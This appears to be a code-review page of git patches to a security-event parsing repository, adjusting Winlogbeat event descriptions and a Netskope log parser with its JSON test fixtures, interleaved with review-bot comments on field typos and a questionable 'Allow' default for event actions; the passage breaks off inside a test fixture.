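Review bot: The new 4672 entry's condition `{ "field": "action.properties.SubjectuserName" }` (lower-case "u") does not match the `action.properties.SubjectUserName` key its `value` renders, so if conditions require the named field to be present this description is presumably never selected and every such event falls through to the `{user.domain}\{user.name}` variant that follows. Change it to `{ "field": "action.properties.SubjectUserName" }`. Its `relationships` entry also links `user.name` to `host.name` while the text is built from the `action.properties.*` fields; that may be deliberate, but the two should agree so the graph edge is drawn from the same identity the description shows.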
@@ -1068,6 +1106,58 @@ } ] }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, { "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", "relationships": [ @@ -1085,6 +1175,18 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" } ] }, From 2207f3078290450fbbbcfe9b4584bf68d7a3fb49 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:47:15 +0100 Subject: [PATCH 251/317] fixing typo --- Beats/winlogbeat/_meta/smart-descriptions.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
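Review bot: The first new 5156 entry ("allowed a connection from …") declares a relationship with target `action.properties.DestAddress`, but its conditions only require `SourceAddress` and `SourcePort`, so the edge can be emitted for an event that carries no destination; add `{ "field": "action.properties.DestAddress" }` to that entry's conditions or drop the relationship, mirroring what the last hunk does for the combined from/to entry. The second entry's value still reads `{action.properties.DestAdress}` while its condition is spelled `DestAddress`; that typo is corrected by commit 2207f30 further down this page, so no separate change is needed here.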
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index d3979925e..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1133,7 +1133,7 @@ ] }, { - "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", @@ -1159,7 +1159,7 @@ ] }, { - "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", From 6abd31bb9209f77aab598e290a7c8370a98a67ff Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Tue, 19 Nov 2024 10:55:07 +0100 Subject: [PATCH 252/317] Fixes on Netskope format --- Netskope/netskope_events/ingest/parser.yml | 5 +- .../test_audit_log_deleted_inline_policy.json | 1 + .../test_audit_log_edit_admin_record.json | 1 + .../tests/test_audit_log_login_failed.json | 1 + .../test_audit_log_login_successful.json | 1 + .../test_audit_log_logout_successful.json | 1 + ..._audit_log_password_change_successful.json | 1 + .../tests/test_connection_log.json | 1 + .../tests/test_dlp_incident.json | 3 +- .../tests/test_malware_alert.json | 5 +- .../tests/test_nspolicy_block.json | 109 ++++++++++++++++ .../tests/test_nspolicy_log.json | 3 +- .../tests/test_nspolicy_upload.json | 120 ++++++++++++++++++ .../tests/test_user_alert.json | 2 +- 14 files changed, 248 insertions(+), 6 deletions(-) create mode 100644 Netskope/netskope_events/tests/test_nspolicy_block.json create mode 100644 Netskope/netskope_events/tests/test_nspolicy_upload.json diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..7ce3a2543 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,7 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.activity}}" + event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" 
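Review bot: Defaulting `event.action` to `'Allow'` when neither `action` nor `activity` is set stamps an allow decision on events that are not policy decisions at all: the test fixtures updated in this same commit now expect `"action": "Allow"` on `Login Failed`, `Deleted inline policy`, `Password Change Successful` and a `connection` log that matched an SSL bypass policy, and a detection rule on `event.action` will read a failed admin login as allowed. I would keep `event.action: "{{parsed_event.message.action or parsed_event.message.activity}}"` here and, if Netskope documents that an empty `action` on `nspolicy`/`page` events means the traffic was allowed, add a separate `set` stage for `"Allow"` filtered on `parsed_event.message.type` being one of those datasets and `action`/`activity` being empty. That keeps the audit-log and connection datasets free of a fabricated decision.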
@@ -92,6 +92,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..df70ea26e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..10b406a5f 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..8a792a408 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..01549d366 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json 
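Review bot: This expectation pins `"action": "Allow"` on an `admin_audit_logs` record whose `audit_log_event` is `Login Failed`, which is contradictory and will mislead anyone writing an authentication-failure rule on `event.action`. The value only appears because the parser change in this commit falls back to `'Allow'` when the record has no `action`/`activity`; the fixture should rather assert that `event.action` is absent for this record (or carries the audit event itself), and the same applies to the other audit-log fixtures touched here.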
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..12e39be95 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..a2fa885de 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "iam" ], diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..5c5218356 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -5,6 +5,7 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n 
\"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "network" ], diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..37ab6e32b 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -30,7 +30,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..5e5f6de15 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n 
\"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": 
\"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Download", + "action": "Detection", "category": [ "malware" ], @@ -36,7 +36,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..0d739d4fd --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 
13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_t
